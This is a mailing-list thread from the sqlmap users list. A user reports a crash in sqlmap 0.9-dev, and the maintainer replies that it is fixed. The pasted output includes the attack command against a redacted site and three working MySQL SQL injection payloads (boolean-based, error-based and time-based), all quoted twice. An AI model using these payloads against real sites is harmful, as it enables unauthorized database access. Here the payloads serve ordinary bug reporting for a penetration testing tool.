sqlmap-users

[sqlmap-users] a new and i hope the last bug for 2010

[<ra...@jo...>]

C:\pentest\sqlmap-0.9>sqlmap -u "http://xxxxxxxxxxxxxxxxxxxx.xxx/retrievePhoto.php?fid=236"   --auth-type=basic --auth-cred=xxxx:xxxx -a C:\user-agents.txt --level 5 --risk 3 -x c:\xxxxx

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 19:40:11

[19:40:12] [INFO] fetched random HTTP User-Agent header from file 'C:\user-agents.txt': Opera/9.00 (Wii; U; ; 1038-58; Wii Shop Channel/1.0; en)
[19:40:12] [INFO] using 'C:\pentest\sqlmap-0.9\output\xxxxx.xxxx\session' as session file
[19:40:15] [INFO] resuming injection data from session file
[19:40:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[19:40:15] [INFO] resuming back-end DBMS operating system 'None' from session file
[19:40:15] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:40:15] [INFO] resuming back-end DBMS operating system 'None' from session file
[19:40:15] [INFO] resuming back-end DBMS operating system 'None' from session file
[19:40:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with 0 HTTP(s) requests:
---
Place: GET
Parameter: fid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE clause
    Payload: fid=236" AND 7994=7994 AND "zBkq"="zBkq

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE clause
    Payload: fid=236" AND (SELECT 1744 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,115,110,58),(SELECT (CASE WHEN (1744=1744) THEN 1 ELSE 0 END)),CHAR(58,113,104,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND "EkEX"="EkEX

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: fid=236" AND SLEEP(5) AND "Ftwr"="Ftwr
---


[19:40:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev
Python version: 2.6.6
Operating system: nt
Traceback (most recent call last):
  File "C:\pentest\sqlmap-0.9\sqlmap.py", line 80, in main
    start()
  File "C:\pentest\sqlmap-0.9\lib\controller\controller.py",
   line 387, in start
    __showInjections()
  File "C:\pentest\sqlmap-0.9\lib\controller\controller.py",
 line 121, in __showInjections
    dumper.technic(header, data)
  File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 93, in
 technic
    self.string(header, data)
  File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 65, in
 string
    self.__write("%s:\n---\n%s\n---\n" % (header, data))
  File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 38, in
 __write
    self.__outputFP.write(text)
AttributeError: 'NoneType' object has no attribute 'write'
C:\pentest\sqlmap-0.9>


I wish you all a Happy New Year  :)

Re: [sqlmap-users] a new and i hope the last bug for 2010

[Miroslav S. <mir...@gm...>]

Hi.

Find it fixed in the latest commit. There is still an issue that we haven't
"adjusted" xml structure of the output xml session file with the latest
changes. Will do.

KR, and Happy New Year :)

On Fri, Dec 31, 2010 at 7:56 PM, <ra...@jo...> wrote:

> C:\pentest\sqlmap-0.9>sqlmap -u "
> http://xxxxxxxxxxxxxxxxxxxx.xxx/retrievePhoto.php?fid=236"
> --auth-type=basic --auth-cred=xxxx:xxxx -a C:\user-agents.txt --level 5
> --risk 3 -x c:\xxxxx
>
>    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>    http://sqlmap.sourceforge.net
>
> [*] starting at: 19:40:11
>
> [19:40:12] [INFO] fetched random HTTP User-Agent header from file
> 'C:\user-agents.txt': Opera/9.00 (Wii; U; ; 1038-58; Wii Shop Channel/1.0;
> en)
> [19:40:12] [INFO] using 'C:\pentest\sqlmap-0.9\output\xxxxx.xxxx\session'
> as session file
> [19:40:15] [INFO] resuming injection data from session file
> [19:40:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from
> session file
> [19:40:15] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from
> session file
> [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from
> session file
> [19:40:53] [INFO] testing connection to the target url
> sqlmap identified the following injection points with 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: fid
>    Type: boolean-based blind
>    Title: AND boolean-based blind - WHERE clause
>    Payload: fid=236" AND 7994=7994 AND "zBkq"="zBkq
>
>    Type: error-based
>    Title: MySQL >= 5.0 AND error-based - WHERE clause
>    Payload: fid=236" AND (SELECT 1744 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,101,115,110,58),(SELECT (CASE WHEN (1744=1744) THEN
> 1 ELSE 0 END)),CHAR(58,113,104,110,58),FLOOR(RAND(0)*2))x FROM
> information_schema.tables GROUP BY x)a) AND "EkEX"="EkEX
>
>    Type: AND/OR time-based blind
>    Title: MySQL > 5.0.11 AND time-based blind
>    Payload: fid=236" AND SLEEP(5) AND "Ftwr"="Ftwr
> ---
>
>
> [19:40:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the command line, the following text
> and any information needed to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.6
> Operating system: nt
> Traceback (most recent call last):
>  File "C:\pentest\sqlmap-0.9\sqlmap.py", line 80, in main
>    start()
>  File "C:\pentest\sqlmap-0.9\lib\controller\controller.py",
>   line 387, in start
>    __showInjections()
>  File "C:\pentest\sqlmap-0.9\lib\controller\controller.py",
>  line 121, in __showInjections
>    dumper.technic(header, data)
>  File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 93, in
>  technic
>    self.string(header, data)
>  File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 65, in
>  string
>    self.__write("%s:\n---\n%s\n---\n" % (header, data))
>  File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 38, in
>  __write
>    self.__outputFP.write(text)
> AttributeError: 'NoneType' object has no attribute 'write'
> C:\pentest\sqlmap-0.9>
>
>
> I wish you all a Happy New Year  :)
>
>
> ------------------------------------------------------------------------------
> Learn how Oracle Real Application Clusters (RAC) One Node allows customers
> to consolidate database storage, standardize their database environment,
> and,
> should the need arise, upgrade to a full multi-node Oracle RAC database
> without downtime or disruption
> http://p.sf.net/sfu/oracle-sfdevnl
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia